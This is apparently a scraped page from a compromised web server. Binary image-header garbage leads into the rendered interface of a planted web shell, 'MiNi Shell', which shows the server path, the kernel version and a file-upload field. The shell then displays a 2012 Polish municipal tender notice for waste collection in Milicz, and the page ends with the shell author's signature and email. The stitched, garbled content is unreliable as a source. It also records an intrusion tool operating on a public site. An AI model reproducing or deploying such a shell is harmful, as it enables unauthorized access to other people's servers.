JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/211618-N-2012.html

<p class="kh_header"><b>Milicz: Odbiór odpadów komunalnych z jednostek organizacyjnych i zasobów mieszkaniowych  gminy Milicz</b><br>
<b>Numer ogłoszenia: 211618 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Milicz , ul. Trzebnicka 2, 56-300 Milicz, woj. dolnośląskie, tel. 071 3840004 w. 314, faks 071 3841119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych z jednostek organizacyjnych i zasobów mieszkaniowych  gminy Milicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
I.Odbieranie niesegregowanych odpadów komunalnych (kod odpadu: 200301) z następujących jednostek organizacyjnych i zasobów mieszkaniowych Gminy Milicz wraz z wyposażeniem niektórych nieruchomości w pojemniki zamykane (kolumna 4 tabeli); szacunkowa ilość odpadów do odebrania wynosi ok. 600 m3/rok:

L.p.	Nazwa jednostki, adres	Ilość i pojemność pojemników do opróżnienia,	Ilość i pojemność pojemników do dostarczenia,	Częstotliwość opróżniania:

1.Gimnazjum w Miliczu, Milicz, ul. Armii Krajowej 7, 3 x 1100 l -	2 razy w miesiącu
2.Przedszkole Samorządowe w Miliczu, Milicz, ul. Grunwaldzka 1,3 x 1100 l, 2 x 1100 l,2 razy w miesiącu;
3. Świetlica Chatka Puchatka, Milicz, al. Lipowa 1,1 x 1100 l -	2 razy w miesiącu;
4. Ochotnicza Straż Pożarna w Miliczu, Milicz, ul. Kuźnicza 8	1 x 120 l	-	2 razy w miesiącu;
5. Biblioteka Publiczna w Miliczu, Milicz, ul. Piłsudskiego 14,2 x 120 l,1 x 120 l,	2 razy w miesiącu;
6. Urząd Miejski w Miliczu, Milicz, ul. Trzebnicka 2,	4 x 1100 l,	1 x 1100 l,	2 razy w miesiącu
7.Socjalny budynek mieszkalny, Milicz, ul. Krotoszyńska 49, 3 x 1100 l, 3 x 1100l, 2 razy w miesiącu;
8.Centrum Aktywności Lokalnej, Milicz, pl. ks. E. Waresiaka 7, 1 x 1100 l	 - 2 razy w miesiącu;
9. Gimnazjum im. Jana Pawła II w Sułowie, Sułów, ul. Szkolna 6, 2 x 1100 l, 1 x 1100l, 1 raz w miesiącu;
10.Szkoła Podstawowa im. Juliusza Słowackiego w Sułowie, ul. Szkolna 6, 2 x 1100 l, 1 x 1100 l, 1 raz w miesiącu;
11. Szkoła Podstawowa w Dunkowej, Dunkowa 1, 1 x 1100 l	1 x 1100 l, 1 raz w miesiącu, 
12. Szkoła Podstawowa w Czatkowicach, Czatkowice, ul. Szosowa 2, 2 x 120 l -	1 raz w miesiącu;
13. Szkoła Podstawowa w Nowym Zamku, Nowe Grodzisko 9, 1 x 1100 l	- 1 raz w miesiącu;
14. Szkoła Podstawowa we Wziąchowie Wielkim, Wziąchowo Wielkie 47,	4 x 1100 l, 2 x 1100 l, 1 raz w miesiącu;
15. Gimnazjum we Wróblińcu, Wróbliniec 24, 1 x 1100 l -1 raz w miesiącu;
16. Świetlica wiejska, Baranowice 17, 1 x 120 l,	1 x 120 l -	1 raz w miesiącu;
17.Świetlica wiejska, Bartniki 29, 1 x 120 l	, 1 x 120 l -	1 raz w miesiącu;
18. Świetlica wiejska, Borzynowo 7,	1 x 120 l, 1 x 120 l -1 raz w miesiącu;
19. Świetlica wiejska, Brzezina Sułowska 3a, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
20. Świetlica wiejska, Czatkowice, ul. Szosowa 6,1 x 120 l, 1 x 120 l -1 raz w miesiącu;
21. Świetlica wiejska, Duchowo 48,1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
22. Świetlica wiejska, Dunkowa 7, 1 x 120 l,1 x 120 l -1 raz w miesiącu;
23.Świetlica wiejska, Gądkowice 45a, 1 x 1100 l	- 1 raz w miesiącu;
24. Świetlica wiejska, Godnowa 9, 1 x 120 l, 1 x 120 l	- 1 raz w miesiącu;
25.Świetlica wiejska, Gołkowo - wiata, 1 x 120 l, 1 x 120 l -	1 raz w miesiącu;
26.Świetlica wiejska, Gogołowice,1 x 120 l, 1 x 120 l -	1 raz w miesiącu;
27. Świetlica wiejska, Grabownica 5b, 1 x 120 l,	1 x 120 l - 1 raz w miesiącu;
28.Świetlica wiejska, Grabówka 28a,1 x 120 l, 1 x 120 l -1 raz w miesiącu;
29. Świetlica wiejska, Gruszeczka 17a, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
30. Świetlica wiejska, Henrykowice 19, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
31. Świetlica wiejska, Kaszowo 34, 1 x 120 l, 1 x 120 l -1 raz w miesiącu;
32. Kolęda - plac zabaw, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
33.Świetlica wiejska, Latkowa 23, 1 x 120 l,1 x 120 l -1 raz w miesiącu;
34.Świetlica wiejska, Łąki 21, 1 x 120 l, 1 x 120 l -1 raz w miesiącu;
35. Świetlica wiejska, Miłochowice,1 x 120 l, 1 x 120 l -1 raz w miesiącu;
36. Świetlica wiejska, Miłosławice 19c,1 x 120 l,	1 x 120 l -1 raz w miesiącu;
37.Świetlica wiejska, Młodzianów 24a,1 x 120 l,1 x 120 l -1 raz w miesiącu;
38.Świetlica wiejska, Olsza 3a	, 1 x 120 l,	1 x 120 l -1 raz w miesiącu;
39.Świetlica wiejska, Ostrowąsy 31,	1 x 120 l, 1 x 120 l -1 raz w miesiącu;
40. Świetlica wiejska, Piękocin 38,1 x 120 l, 1 x 120 l	- 1 raz w miesiącu;
41. Świetlica wiejska, Piotrkosice 49, 1 x 120 l,	1 x 120 l -1 raz w miesiącu;
42. Świetlica wiejska, Poradów 3a, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
43.Świetlica wiejska, Potasznia 12, 1 x 120 l, 1 x 120 l -1 raz w miesiącu;
44. Świetlica wiejska, Pracze 11,1 x 120 l, 1 x 120 l -	1 raz w miesiącu;
45.Ruda Milicka - parking,1 x 240 l,	1 x 240 l -1 raz w miesiącu;
46. Świetlica wiejska, Sławoszowice, ul. 3 Maja 12a, 1 x 120 l - 1 raz w miesiącu;
47. Świetlica wiejska, Słączno 2a, 1 x 120 l -	1 raz w miesiącu;
48. Świetlica wiejska, Sulimierz 21a,	1 x 120 l, 1 x 120 l, 1 raz w miesiącu;
49. Stawiec - plac zabaw, 1 x 120 l,  1 x 120 l -1 raz w miesiącu;
50. Świetlica wiejska, Świętoszyn 17a, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
51. Świetlica wiejska, Tworzymirki 6, 1 x 120 l, 1 x 120 l - 1 raz w miesiącu;
52. Świetlica wiejska, Tworzymirki Górne 21, 1 x 120 l, 1 x 120 l -	1 raz w miesiącu;
53. Świetlica wiejska, Wielgie Milickie 9, 1 x 120 l, 	1 x 120 l	1 raz w miesiącu; 54. Świetlica wiejska, Wilkowo 5a, 1 x 120 l, 1 x 120 l -1 raz w miesiącu;
55. Świetlica wiejska, Wrocławice 20a, 1 x 120 l, 1 x 120 l 	- 1 raz w miesiącu;
56. Świetlica wiejska, Wróbliniec 6, 1 x 120 l,1 x 120 l - 1 raz w miesiącu;
57. Świetlica wiejska, Wziąchowo Wielkie 39a, 1 x 120 l,1 x 120 l -1 raz w miesiącu;

II. Odbieranie odpadów komunalnych zbieranych selektywnie z podziałem na szkło,
  tworzywa sztuczne i makulaturę z jednostek organizacyjnych wymienionych w punkcie   1. wraz z wyposażeniem nieruchomości w odpowiednio oznakowane worki o pojemności   120 l do zbiórki selektywnej w kolorach: zielony na szkło, żółty na tworzywa sztuczne, niebieski na makulaturę.   Szacunkowa ilość odpadów do odebrania wynosi ok. 100 m3/rok:

III. Jednostki wymienione w pozycjach: 1, 2, 3, 6 - 15, należy wyposażyć w zestaw stojaków  na worki dla każdej frakcji zbieranej selektywnie (3 stojaki w zestawie) oraz po 3 szt. worków na każdą frakcję na miesiąc.

IV. Pozostałym jednostkom wymienionym w tabeli w punkcie 1. należy dostarczać zestaw 3 worków - bez stojaków (po 1 szt. na każdą frakcję) raz w miesiącu.

V. Odpady zbierane selektywnie w workach należy odbierać z częstotliwością raz w
    miesiącu.
 
VI. Przedsiębiorca odbierający odpady komunalne musi zapewnić odbiór odpadów
    wielkogabarytowych oraz zużytego sprzętu RTV i AGD oraz odpadów z remontów z
    jednostek wymienionych w punkcie 1. poprzez zorganizowanie 2 zbiórek w okresie
    trwania umowy w terminie uzgodnionym z Zamawiającym. Szacunkowa ilość odpadów do odebrania wynosi ok. 50 m3 na rok:

VII.  Przedsiębiorca odbierający odpady zapewni dodatkowo odbiór popiołu i żużla
    powstającego w sezonie grzewczym - od 1 października do 30 kwietnia - w
    kotłowniach   komunalnych na terenie niżej wymienionych nieruchomości wraz z wyposażeniem nieruchomości w odpowiednie pojemniki o pojemności minimum 1100 l:
   a) socjalny budynek mieszkalny w Miliczu, ul. Krotoszyńska 49 - ok. 10 m3 na sezon,
   b) budynek mieszkalny w Miliczu, ul. Wojska Polskiego 8 - ok. 20 m3 na sezon.

VIII.  Przedsiębiorca odbierający odpady komunalne dostarczy harmonogram odbioru poszczególnych rodzajów odpadów Zamawiającemu oraz każdej z jednostek   wymienionych w punkcie 1. (jednostki poz. 1 - 15 kierownikom jednostek; poz. 16 -  57 sołtysom poszczególnych sołectw).

9.Wykonawca obowiązany jest wystawić odrębne faktury VAT dla każdego z podmiotów jako płatnika (wyszczególnionych w punkcie III ppkt 1 niniejszej Specyfikacji), od którego odbierane będą odpady komunalne. Odrębne faktury będą wystawiane dla podmiotów - płatników wymienionych w pozycjach: 1, 2, 5, 9 - 15 w punkcie III ppkt 1 niniejszej Specyfikacji. Za pozostałe jednostki (pozycje: 3, 4, 6, 7, 8, 16 - 57  w punkcie III ppkt 1 oraz w punkcie III ppkt 7b  niniejszej Specyfikacji faktura powinna być wystawiona dla Zamawiającego.
- przedmiot zamówienia określa również projekt umowy, który stanowi załącznik Nr 9 do Specyfikacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego możliwość udzielenia zamówień uzupełniających w trybie zamówienia z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010r., Nr 133, poz. 759 z późn. zm.)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.40.00.00-1, 90.50.00.00-2, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 1.000,00 zł, słownie: jeden tysiąc złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedłożą wraz z ofertą zezwolenie Burmistrza Gminy Milicz na prowadzenie działalności polegającej na odbieraniu odpadów komunalnych od właścicieli nieruchomości lub uzyskali wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z przepisami ustawy z dnia 13 września 1996 o utrzymaniu czystości i porządku w gminach (t. j. Dz. U. z 2012 r., poz. 391).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykażą, iż wykonali prawidłowo trzy usługi związane z odbiorem, odpadów  komunalnych od właścicieli nieruchomości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż dysponują niezbędnymi do wykonania zamówienia jednostkami transportowymi, które spełniają określone przez Zamawiającego wymogi tzn. co najmniej jeden samochód do opróżniania pojemników na niesegregowane odpady komunalne  - samochody bezpyłowe oraz co najmniej jeden samochód przystosowany do odbierania odpadów zbieranych w sposób selektywny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu: 
1) wypełniony i podpisany formularz ofertowy wg wzoru z załącznika nr 1 do Specyfikacji,
2) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Pzp, wg wzoru z załącznika nr 2 do Specyfikacji.
Dwa lub więcej podmiotów gospodarczych może złożyć ofertę wspólną (art. 23 ust. 1 Ustawy). W tym przypadku składana oferta winna spełniać następujące wymagania:
a) oferta winna zawierać pełnomocnictwo do reprezentowania Wykonawców w przetargu, podpisane przez upoważnionych przedstawicieli wszystkich składających wspólną ofertę Wykonawców. Pełnomocnictwo musi wskazywać pełnomocnika. 
W przypadku wyboru jako najkorzystniejszej, złożonej wspólnie przez Wykonawców oferty , Zamawiający - przed podpisaniem umowy na realizację zamówienia - zastrzega sobie prawo do żądania przedstawienia umowy konsorcjum określającej strony - tj. Wykonawców, których wspólna oferta została wybrana jako najkorzystniejsza, ze wskazaniem lidera oraz cel, w jakim umowa ta została zawarta, prawa i obowiązki jej stron, zakres usług do wykonania przez każdego uczestnika konsorcjum oraz czas trwania umowy. Czas trwania umowy konsorcjum powinien być określony do upływu terminu odpowiedzialności z tytułu gwarancji za wykonane usługi;
a)ustanowiony pełnomocnik winien być upoważniony do zaciągania zobowiązań i realizowania płatności w imieniu każdego z Wykonawców, którzy wspólnie złożyli ofertę, działania na ich rzecz oraz do wyłącznego reprezentowania Wykonawców, którzy wspólnie złożyli ofertę w realizacji umowy o zamówienie publiczne.
b)oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w punktach X ppkt 3 lit. a) - b) Specyfikacji  dla każdego z Wykonawców, którzy wspólnie złożyli ofertę z osobna; pozostałe dokumenty wymagane od Wykonawców składane są przez Wykonawców wspólnie;
c)Wykonawcy, którzy wspólnie złożyli ofertę ponoszą solidarną odpowiedzialność za wykonanie umowy;
d)jeśli wystąpi przesłanka wykluczenia jednego z Wykonawców, którzy wspólnie złożyli ofertę, Zamawiający wykluczy z postępowania wszystkich Wykonawców, którzy łącznie z podlegającym wykluczeniu Wykonawcą złożyli ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian do umowy na podstawie art. 144 ust.1 ustawy  zdnia 29.01.2004 r. Prawo zamówień publicznych, w następujących sytuacjach:
 a) z powodu okoliczności, których wystąpienie było niezależne od Wykonawcy bądź Zamawiającego (przykładowa okoliczność - siła wyższa),
 b) w przypadku zmiany stawki podatku od towarów i usług (VAT) na usługi określone w przedmiocie zamówienia, czego następstwem będzie zmiana wynagrodzenia umownego. W ww. przypadkach strona dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty przemawiające za dokonaniem zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.milicz.pl lub Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 58, w cenie 10,00 zł, na wniosek oferenta zgodnie z art. 42 ust. 2 Pzp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 10:00, miejsce: Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 15 (Punkt Obsługi Mieszkańców), termin otwarcia ofert: 28.06.2012, godz. 10:30, sala nr 4 (na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com